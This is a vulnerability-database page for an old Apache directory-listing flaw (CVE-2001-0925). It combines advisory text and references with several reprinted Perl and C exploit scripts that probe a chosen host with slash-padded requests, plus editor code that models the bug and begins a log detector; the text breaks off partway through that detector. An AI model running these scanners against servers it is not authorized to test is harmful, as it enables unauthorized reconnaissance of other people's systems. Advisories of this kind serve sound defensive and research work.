CVE-2001-0925
CVSS 5.0
Published: 2001-03-12 00:00:00
Revised: 2008-09-05 16:25:15

[Original text] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.


[CNNVD] Apache crafted over-long slash path directory information disclosure vulnerability (CNNVD-200103-004)

        
        Apache is a widely used open-source web server.
        Apache's implementation has a directory information disclosure flaw; a remote attacker may exploit it to obtain directory listings.
        In the default configuration Apache enables mod_dir, mod_autoindex and mod_negotiation. An attacker can send the Apache server a specially crafted request consisting of many slash ("/") characters, which causes these modules to misbehave, so that the error page is bypassed and a listing of the directory contents is returned.
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no special access conditions are required to exploit]
Attack vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0925
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0925
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200103-004
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/6921.php
(VENDOR_ADVISORY)  XF  apache-slash-directory-listing(6921)
http://www.securityfocus.com/bid/2503
(VENDOR_ADVISORY)  BID  2503
http://www.securityfocus.com/archive/1/168497
(VENDOR_ADVISORY)  BUGTRAQ  20010312 FORW: [ANNOUNCE] Apache 1.3.19 Released
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-077.php3
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2001:077
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&start=2002-01-27&end=2002-02-02&mid=199857&threads=1
(UNKNOWN)  BUGTRAQ  20010726 Apache Artificially Long Slash Path Directory Listing Vulnerability -- FILE READ ACCESS
http://www.securityfocus.com/archive/1/193081
(VENDOR_ADVISORY)  BUGTRAQ  20010624 Fw: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
http://www.securityfocus.com/archive/1/178066
(UNKNOWN)  BUGTRAQ  20010419 OpenBSD 2.8patched Apache vuln!
http://www.linuxsecurity.com/advisories/other_advisory-1452.html
(UNKNOWN)  ENGARDE  ESA-20010620-02
http://www.debian.org/security/2001/dsa-067
(UNKNOWN)  DEBIAN  DSA-067
http://www.apacheweek.com/features/security-13
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/features/security-13

- Vulnerability Information

Apache crafted over-long slash path directory information disclosure vulnerability
Severity: Medium   Type: Input validation
Published: 2001-03-12 00:00:00   Updated: 2006-08-31 00:00:00
Remote

- Advisories and Patches

        Vendor patch:
        Apache Group
        ------------
        The vendor has released an upgrade that fixes this issue; download it from the vendor's site:
        
        http://httpd.apache.org/download.cgi

- Vulnerability Information (20692)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1) (EDBID:20692)
Platform: multiple   Type: remote
2001-06-13 Verified
Port: 0   Author: rfp
source: http://www.securityfocus.com/bid/2503/info

Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems.

A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents.

This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. 

#!/usr/bin/perl
#
# original by farm9, Inc. (copyright 2001)
# then modified by Siberian (www.sentry-labs.com)
# with more modifications by rfp (www.wiretrip.net/rfp/)
#
##########################################################################

use libwhisker;
use Getopt::Std;

# apache3.pl
# this exploit was modified to use the libwhisker library, which gives
# HTTP/1.1, proxy, and SSL support.  Plus, small other changes.

$|++;
my (%hin,%hout,%args);

print "Apache Artificially Long Slash Path Directory Listing Exploit\n";
print "SecurityFocus BID 2503\n\n";
print "Original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n";
print "Moved to libwhisker by rfp\n\n";

getopts("p:L:H:sP:R:h:",\%args);

if($args{h} eq ''){
 print 'Usage: ./apache3.pl <options>, where options:',"\n";
 print '-h host  host to scan (must be specified)',"\n";
 print '-p ##	 host port (default: 80)',"\n";
 print '-L ##	 low end/start of range (default: 1)',"\n";
 print '-H ##	 high end/end of range (default: 8192)',"\n";
 print '-P host	 HTTP proxy via host',"\n";
 print '-R ##	 HTTP proxy port (default: 80)',"\n";
 print '-s	 use SSL (can\'t be used with proxy)',"\n";
 exit 0;
}

$low =  $args{L} || 1;
$high = $args{H} || 8192;

&lw::http_init_request(\%hin);		# setup our request hash

$hin{'whisker'}->{'host'}= $args{h};

$hin{'whisker'}->{'port'}= $args{p} || 80;

if(defined $args{s}){
 	$hin{'whisker'}->{'ssl'} = 1; 

	if(defined $args{P}){
		print "SSL not currently compatible with proxy\n";
		exit 1; 
	}
}

if(defined $args{'P'}){
	$hin{'whisker'}->{'proxy_host'}=$args{P};
	$hin{'whisker'}->{'proxy_port'}=$args{R} || 80;
	print "Using proxy host $hin{'whisker'}->{'proxy_host'} on ";
	print "port $hin{'whisker'}->{'proxy_port'}\n";
}


&lw::http_fixup_request(\%hin);		# fix any HTTP requirements

for($c=$low; $c<=$high; $c++){

	$hin{'whisker'}->{'uri'} = '/' x $c;

	if(&lw::http_do_request(\%hin,\%hout)){
		print "Error: $hout{'whisker'}->{'error'}\n";
		exit 1;
	} else {
		if($hout{'whisker'}->{'http_resp'} == 200 &&
			$hout{'whisker'}->{'data'}=~/index of/i){

			print "Found result using $c slashes.\n";
			exit 0;
		}
	}

	print "."; # for status
}

print "\nNot vulnerable (perhaps try a different range).\n";


		

- Vulnerability Information (20693)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2) (EDBID:20693)
Platform: multiple   Type: remote
2002-02-21 Verified
Port: 0   Author: st0ic
source: http://www.securityfocus.com/bid/2503/info
 

/*
Program: apacheslash.c
Original Date: 2-21-02
Version: 1.0
Platform: Linux (compiled on SuSE 7.3)
c0der: st0ic
site: www.fsix.net
e-mail: st0ic@blackcodemail.com

Revised:
	NONE thus far

Description: This program tests an Apache installation for the "Apache Artificially Long Slash Path 
Directory Listing Exploit."  See SecurityFocus.com BID 2503 - http://online.securityfocus.com/bid/2503 

Compile: gcc apacheslash.c -o apacheslash

Stuff: I know there are already 3 Perl scripts that test this bug out, but their execution time is horrible
so I was bored and decided to recode it in C for execution speed's sake. On my box, I think it took
about 8 mins to send 1000 /'s to apache with apache2.pl. It takes about 2 seconds with this program.
BTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT vulnerable :-). Check out the securityfocus.com
BID 2503 to find out what's vulnerable and what's not.

I also included the comments from apache2.pl exploit which was modified
by Siberian of sentry-labs.com. Read below for the details:

/*************************************************
#!/usr/bin/perl
#
# original by farm9, Inc. (copyright 2001)
# new modified code by Siberian (www.sentry-labs.com)
#
########################################################################################
#
# Note: This isn't the original exploit! This one was modified and partly rewritten. 
#
# Changes:
#
# - help added (more user friendly :-) )
# - messages added 
# - exploit is now able to be executed on WinNT or 2k.
# - uses perl version of BSD sockets (compatible to Windows)
# 
# Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
# of the code and made it easier to use and cross platform compatible.
# The old version used an easier but not that compatible way of socket stream communication.  
# Any network code was replaced by cross platform compatible BSD sockets.
# (much better than any other stream method :-) )
# 
# Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
#
# Original comment and source is attached below.
#
########################################################################################
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#	   very specific cases would feed stat() a filename that was longer than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */	/*
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never though corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
-----snip snip----
**************************************************/

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

char tmp[10240];	/* request buffer  */
char output[10240];	/* response buffer */
char *get = "GET ";
char *http = " HTTP/1.0\r\n";
char *end = "\r\n\r\n";
int c;
int port = 80;		/* used when -p is not given */
int low;
int max;
int sockfd;
int bytes_received;
size_t total;
int count;
char *addr;

struct sockaddr_in dest_addr;
struct hostent *he;

void usage(char *ptr)
{
	fprintf(stderr, "\n\t%s <-h host> <-p port> <-l LOW> <-m MAX>", ptr);
	fprintf(stderr, "\n\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\n", ptr);
	fprintf(stderr, "\n\tLOW is how many /'s to start with and MAX is how many /'s to end with.\n");
	fprintf(stderr, "\tMAX must leave room for the request line in a %lu byte buffer.\n\n",
		(unsigned long) sizeof(tmp));
	exit(1);
}


int main(int argc, char *argv[])
{
	printf("\n\t[       apacheslash.c     ]");
	printf("\n\t[      c0ded by st0ic     ]");
	printf("\n\t[         Fsix.Net        ]");
	printf("\n\t[ st0ic@happyhack.zzn.com ]\n\n");

	while ( ( c = getopt(argc, argv, "h:p:l:m:") ) != -1)
	{
		switch(c)
		{
			case 'h':
				addr = optarg;
				break;
			case 'p':
				port = atoi(optarg);
				break;
			case 'l':
				low = atoi(optarg);
				break;
			case 'm':
				max = atoi(optarg);
				break;
			default:
				usage(argv[0]);
		}
	}

	/* "GET " + MAX slashes + " HTTP/1.0\r\n" + "\r\n\r\n" + NUL must fit in tmp */
	if ( low > max || low < 0 || addr == NULL || port <= 0 || port > 65535 ||
	     (size_t) max + strlen(get) + strlen(http) + strlen(end) >= sizeof(tmp) )
		usage(argv[0]);

	if ( (he = gethostbyname(addr)) == NULL)
	{
		herror("gethostbyname");
		exit(1);
	}

	dest_addr.sin_family = AF_INET;
	memcpy(&dest_addr.sin_addr, he->h_addr_list[0], sizeof(dest_addr.sin_addr));
	dest_addr.sin_port = htons(port);
	memset(&dest_addr.sin_zero, 0, sizeof(dest_addr.sin_zero));
	
	printf("\n\t....Working....\n");
	
	while (low <= max)
	{
		count = low;
		memset(tmp, 0, sizeof(tmp));
		memset(output, 0, sizeof(output));	/* no stale "Index of" from an earlier response */
		
		if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
		{
			perror("socket");
			break;
		}

		/* connect() takes a generic struct sockaddr pointer */
		if (connect (sockfd, (struct sockaddr *) &dest_addr, sizeof(dest_addr) ) == -1)
		{
			perror("connect");
			exit(1);
		}
		
		/* build "GET " + count slashes + " HTTP/1.0\r\n\r\n\r\n" */
		strcpy(tmp, get);
		memset(tmp + strlen(tmp), '/', count);	/* tmp was zeroed, so it stays NUL-terminated */
		strcat(tmp, http);
		strcat(tmp, end);
		
		/* send only the request bytes, not the entire 10 KiB buffer */
		if (send(sockfd, tmp, strlen(tmp), 0) == -1)
		{
			perror("send");
			close(sockfd);
			exit(1);
		}
		
		/* read the whole response (HTTP/1.0: the server closes when done),
		   leaving room for the terminating NUL that strstr() needs */
		total = 0;
		while (total < sizeof(output) - 1 &&
		       (bytes_received = recv(sockfd, output + total, sizeof(output) - 1 - total, 0)) > 0)
			total += bytes_received;
		output[total] = '\0';

		if ( strstr(output, "Index of") != NULL )
		{
			printf("\n\tNumber of \"/\"'s required to generate a directory listing = %d\n", low);
			close(sockfd);
			exit(0);
		}
		
		low++;
		close(sockfd);
	}
	
	printf("\nHost does not appear to be vulnerable. Maybe try some different numbers...\n");
	
	return 0;
}
		

- Vulnerability Information (20694)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3) (EDBID:20694)
Platform: multiple   Type: remote
2001-06-13 Verified
Port: 0   Author: farm9
source: http://www.securityfocus.com/bid/2503/info
  

#!/usr/bin/perl
#
# farm9, Inc. (copyright 2001)
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#	   very specific cases would feed stat() a filename that was longer than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never though corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#

use IO::Socket;

$low  = $ARGV[3]; #Low number of slash characters to try
$hi   = $ARGV[2]; #High number of slash characters to try
$port = $ARGV[1]; #Port to try to connect to
$host = $ARGV[0]; #Host to try to connect to

# Main loop.  Not much to this exploit once you figure out what needed to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a different number
# of /.  Send me the numbers if you don't mind matt@farm9.com

while($low <= $hi)
{

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed";

  $url = "";
  $buffer = "";
  $end = "";

  $url = "GET ";
  $buffer = "/" x $low . " HTTP/1.0\r\n";
  $end = "\r\n\r\n";

  $url = $url . $buffer . $end;

  print $socket "$url";
  while(<$socket>)
  {
    if($_ =~ "Index of")
    {
      print "Found the magic number: $low\n";
      print "Now go do it by hand to see it all\n";
      close($socket);
      exit;
    }
  }

  close($socket);
  $low++;
}
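The Details and Conditions block in the exploit header above pins the root cause on a stat() call that is handed a filename longer than the operating system accepts, with the failure collapsed into st_mode = 0 and read by the caller as "no index.html here". The C program below is an added example written for this page, not code from Apache or from any of the exploit authors: it reproduces that decision against the local filesystem, places the pre-1.3.19 check beside a checked variant that distinguishes ENOENT from every other stat() failure (the checked variant is the editor's illustration, not the actual 1.3.19 fix), and measures where stat() starts failing on the machine it runs on. The document root /var/www and the file name index.html are assumed values.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>

/* "<dir>" + n slashes + "<file>": the shape of the filename that
 * ap_sub_req_lookup_file() hands to stat() for a request of n slashes.
 * Returns a malloc()ed string the caller frees, or NULL on allocation failure. */
char *slash_path(const char *dir, size_t n, const char *file)
{
	size_t dl = strlen(dir), fl = strlen(file);
	char *p = malloc(dl + n + fl + 1);
	if (p == NULL)
		return NULL;
	memcpy(p, dir, dl);
	memset(p + dl, '/', n);
	memcpy(p + dl + n, file, fl + 1);	/* includes the terminating NUL */
	return p;
}

/* Model of the pre-1.3.19 fragment quoted in the exploit header:
 *     if (stat(rnew->filename, &rnew->finfo) < 0) rnew->finfo.st_mode = 0;
 * Every stat() failure, ENAMETOOLONG included, collapses to st_mode 0, which
 * the caller reads as "no index.html here" and falls through to the autoindex
 * listing.  Returns st_mode, 0 on any failure, -ENOMEM if the path could not
 * be built. */
long lookup_1_3_18(const char *dir, size_t n, const char *file)
{
	struct stat st;
	char *p = slash_path(dir, n, file);
	if (p == NULL)
		return -ENOMEM;
	if (stat(p, &st) < 0)
		st.st_mode = 0;		/* the flaw: "too long" is treated like "absent" */
	free(p);
	return (long) st.st_mode;
}

/* Defensive variant (editor's illustration, not the 1.3.19 patch): only ENOENT
 * means "no such file"; any other failure comes back as -errno so the caller
 * can refuse the request instead of listing the directory. */
long lookup_checked(const char *dir, size_t n, const char *file)
{
	struct stat st;
	int e;
	char *p = slash_path(dir, n, file);
	if (p == NULL)
		return -ENOMEM;
	if (stat(p, &st) < 0) {
		e = errno;
		free(p);
		return e == ENOENT ? 0 : -(long) e;
	}
	free(p);
	return (long) st.st_mode;
}

/* Smallest slash count at which stat() of a pure-slash path fails with
 * ENAMETOOLONG on this machine (PATH_MAX, 4096 on Linux), or 0 if none up to
 * limit.  A pure-slash path still names "/", so the failure is purely length. */
size_t smallest_failing_slashes(size_t limit)
{
	size_t n;
	for (n = 1; n <= limit; n++) {
		struct stat st;
		int failed;
		char *p = slash_path("", n, "");
		if (p == NULL)
			return 0;
		failed = (stat(p, &st) < 0 && errno == ENAMETOOLONG);
		free(p);
		if (failed)
			return n;
	}
	return 0;
}

int main(void)
{
	const char *docroot = "/var/www";	/* assumed document root */
	printf("stat() starts failing with ENAMETOOLONG at %zu slashes\n",
	       smallest_failing_slashes(16384));
	printf("1.3.18-style lookup of %s + 8192 slashes + index.html -> st_mode %ld (0 = fall through to the index)\n",
	       docroot, lookup_1_3_18(docroot, 8192, "index.html"));
	printf("checked lookup of the same path -> %ld (-%d is ENAMETOOLONG: refuse the request)\n",
	       lookup_checked(docroot, 8192, "index.html"), ENAMETOOLONG);
	return 0;
}
```

On Linux the probe reports 4096. The number of slashes a request needs is roughly that limit minus the length of the document-root prefix and of the index file name that Apache appends, which is why the figure differs between operating systems and installations (the header above cites around 4060 on Debian) and why the scripts on this page scan a range rather than send one fixed count.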
		

- Vulnerability Information (20695)

Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4) (EDBID:20695)
Platform: multiple   Type: remote
2001-06-13 Verified
Port: 0   Author: farm9
source: http://www.securityfocus.com/bid/2503/info
   

#!/usr/bin/perl
#
# original by farm9, Inc. (copyright 2001)
# new modified code by Siberian (www.sentry-labs.com)
#
########################################################################################
#
# Note: This isn't the original exploit! This one was modified and partly rewritten. 
#
# Changes:
#
# - help added (more user friendly :-) )
# - messages added 
# - exploit is now able to be executed on WinNT or 2k.
# - uses perl version of BSD sockets (compatible to Windows)
# 
# Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some
# of the code and made it easier to use and cross platform compatible.
# The old version used an easier but not that compatible way of socket stream communication.  
# Any network code was replaced by cross platform compatible BSD sockets.
# (much better than any other stream method :-) )
# 
# Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32)
#
# Original comment and source is attached below.
#
########################################################################################
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info:  This exploit tricks apache into returning a Index of the a directory
#    even if an index.html file is present.  May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in
#	   very specific cases would feed stat() a filename that was longer than
#	   stat() could handle.  This would result in a condition where stat()
#	   would return 0 and a directory index would be returned instead of the
#	   default index.html.
#
# Code Fragment: /src/main/http_request.c
#    if (strchr(new_file, '/') == NULL) {
#        char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
#        rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
#        rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
#        ap_parse_uri(rnew, rnew->uri);    /* fill in parsed_uri values */
#        if (stat(rnew->filename, &rnew->finfo) < 0) {   <-- Important part
#            rnew->finfo.st_mode = 0;
#        }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled
#	      The directory must also have the following Options enabled:
#             Indexes and MultiView
#	      Some OS's have different conditions on the number of character
#	      you have to pass to stat to make this work.  If stat doesn't
#	      return 0 for path names less than 8192 or so internal apache
#	      buffer checks will stop this exploit from working.
#
# 	      Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache for me
#	  while i was trying to figure out what had to be enabled to make this
#	  exploit work.  Also thanks to rfp for pointing out that MultiView
#	  needed to be enabled.
#
# More Greets:  Jeff for not shooting me :) <All your Cisco's belong to us>
#               Anne for being so sexy <I never though corporate espionage
#                   would be so fun>
#               All my homies at farm9
#               DJ Charles / DJ NoloN for the phat beats
#               Marty (go go gadget snort)
#               All my ex-bees
#               RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up.  Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#
#use IO::Socket;
#
#$low  = $ARGV[3]; #Low number of slash characters to try
#$hi   = $ARGV[2]; #High number of slash characters to try
#$port = $ARGV[1]; #Port to try to connect to
#$host = $ARGV[0]; #Host to try to connect to
#
# Main loop.  Not much to this exploit once you figure out what needed to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a different number
# of /.  Send me the numbers if you don't mind matt@farm9.com
#
#while($low <= $hi)
#{
#
#$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed";
#
#  $url = "";
#  $buffer = "";
#  $end = "";
#
#  $url = "GET ";
#  $buffer = "/" x $low . " HTTP/1.0\r\n";
#  $end = "\r\n\r\n";
#
#  $url = $url . $buffer . $end;
#
#  print $socket "$url";
#  while(<$socket>)
#  {
#    if($_ =~ "Index of")
#    {
#      print "Found the magic number: $low\n";
#      print "Now go do it by hand to to see it all\n";
#      close($socket);
#      exit;
#    }
#  }
#
#  close($socket);
#  $low++;
#}


use Socket;

print "Apache Artificially Long Slash Path Directory Listing Exploit\nSecurityFocus BID 2503\n\n";
print "original exploit code written by Matt Watchinski (www.farm9.com)\n";
print "rewritten and fixed by Siberian (www.sentry-labs.com)\n\n";
$host = shift || 'localhost'; #Host to try to connect to
$port = shift || '80'; #Port to try to connect to
$hi   = shift || '100'; #High number of slash characters to try
$low  = shift || '0'; #Low number of slash characters to try
if(($host eq 'localhost') && ($port eq '80') && ($hi eq '100') && ($low eq '0')) {
print 'Usage: ./apache2.pl <host> <port> <HI> <Low>';
print "\nHi and low are the range for the number of \/ to try\n";
exit 0;
}

print "\ntarget: $host";
print "\nport: $port";
print "\nhi: $hi";
print "\nlow: $low\n\nStarting attack...\n\n";

# Main loop.  Not much to this exploit once you figure out what needed to
# be enabled.  Need to do some more testing on sub-dirs to see if it
# works with them.  It should. Also different OS's might use a different number
# of /.  Send me the numbers if you don't mind matt@farm9.com

$url = "";
$buffer = "";
$end = "";

#$port = (getservbyname($port, 'tcp') || die "No port!");

$iaddr = inet_aton($host) or die "inet_aton: cannot resolve $host";
$paddr = sockaddr_in($port, $iaddr) or die "Failed ...  SOCKADDR_IN!";

$proto = getprotobyname('tcp');

while($low <= $hi) {

socket(SOCKY, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKY, $paddr ) or die "connect: $!";;

$url = "GET ";
$buffer = "/" x  $low .  " HTTP/1.0\r\n";
$end = "\r\n\r\n";

$url = $url . $buffer . $end;

print ".";

 send(SOCKY,$url,0) or die "send: $!";

 # Read the whole response, then look for the autoindex title.  On a
 # connected TCP socket recv() returns an empty (false) peer address, so
 # test for definedness rather than truth.
 $resp = "";
 while(defined(recv(SOCKY,$out,4096,0)) && length($out)) {
     $resp .= $out;
 }
 if($resp =~ /Index of/) {
     print "Found the magic number: $low\n";
     print "Now go do it by hand to see it all\n";
     close(SOCKY);
     exit 0;
 }

  close(SOCKY);
  $low++;
}
print "\n\nNot vulnerable :-(\nCheck some other numbers.\n";

		

- Vulnerability Information

9698
Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
Remote / Network Access Misconfiguration
Loss of Confidentiality
Exploit Public

- Vulnerability Description

Apache HTTP server contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker sends a specially crafted request, consisting of a large number of slash characters '/', to a default Apache install. The default-enabled mod_negotiation and mod_dir/mod_autoindex modules will disclose a directory listing of the root directory instead of index.html, resulting in a loss of confidentiality.
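Requests of this shape leave an unmistakable trace in the access log: the logged request line is thousands of slashes long. The C program below is an added example for this page (the editor's code, not from Apache or from any of the exploit authors): it pulls the request target out of common/combined-format log lines and flags any whose longest run of consecutive slashes reaches a threshold. The log lines it scans are constructed for the example, not captured from a real server.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Longest run of consecutive '/' within the first len bytes of s. */
int longest_slash_run_n(const char *s, size_t len)
{
	int run = 0, best = 0;
	size_t i;
	for (i = 0; i < len; i++) {
		run = (s[i] == '/') ? run + 1 : 0;
		if (run > best)
			best = run;
	}
	return best;
}

int longest_slash_run(const char *s)
{
	return longest_slash_run_n(s, strlen(s));
}

/* Locate the request target in a common/combined log line: the token after
 * the method inside the first double-quoted field ("GET /path HTTP/1.0").
 * Sets *start and *len and returns 1, or returns 0 for a line with no usable
 * request field (the caller then treats the line as not suspicious). */
int find_request_target(const char *line, const char **start, size_t *len)
{
	const char *q = strchr(line, '"');
	const char *sp, *p;
	if (q == NULL)
		return 0;
	sp = strchr(q + 1, ' ');		/* the space after the method */
	if (sp == NULL)
		return 0;
	p = sp + 1;
	while (*p != '\0' && *p != ' ' && *p != '"')
		p++;
	if (p == sp + 1)
		return 0;
	*start = sp + 1;
	*len = (size_t) (p - (sp + 1));
	return 1;
}

/* The longest slash run in the request target when it reaches threshold,
 * 0 otherwise (benign lines and malformed lines both yield 0). */
int suspicious_slash_run(const char *line, int threshold)
{
	const char *t;
	size_t n;
	int run;
	if (!find_request_target(line, &t, &n))
		return 0;
	run = longest_slash_run_n(t, n);
	return run >= threshold ? run : 0;
}

/* Constructed log line for a probe of n slashes, the shape the tools on this
 * page send; the timestamp and client are made up.  Caller frees. */
char *probe_log_line(const char *client, size_t n)
{
	const char *pre = " - - [12/Mar/2001:10:15:04 +0000] \"GET ";
	const char *post = " HTTP/1.0\" 200 2048";
	size_t cl = strlen(client), pl = strlen(pre), ql = strlen(post);
	char *l = malloc(cl + pl + n + ql + 1);
	if (l == NULL)
		return NULL;
	memcpy(l, client, cl);
	memcpy(l + cl, pre, pl);
	memset(l + cl + pl, '/', n);
	memcpy(l + cl + pl + n, post, ql + 1);
	return l;
}

/* Build a probe line of n slashes and scan it; -1 on allocation failure. */
int probe_line_slash_run(size_t n, int threshold)
{
	char *l = probe_log_line("10.0.0.9", n);
	int r;
	if (l == NULL)
		return -1;
	r = suspicious_slash_run(l, threshold);
	free(l);
	return r;
}

/* Constructed benign traffic: a normal fetch, a sloppy double slash, a POST. */
static const char *benign_lines[] = {
	"10.0.0.5 - - [12/Mar/2001:10:15:02 +0000] \"GET /index.html HTTP/1.0\" 200 1234",
	"10.0.0.5 - - [12/Mar/2001:10:15:03 +0000] \"GET /images//logo.gif HTTP/1.0\" 200 812",
	"10.0.0.7 - - [12/Mar/2001:10:15:05 +0000] \"POST /cgi-bin/form.cgi HTTP/1.0\" 302 0",
};

/* Scan the benign sample plus one 4060-slash probe; return how many lines fire. */
int count_flagged_sample_lines(int threshold)
{
	size_t i;
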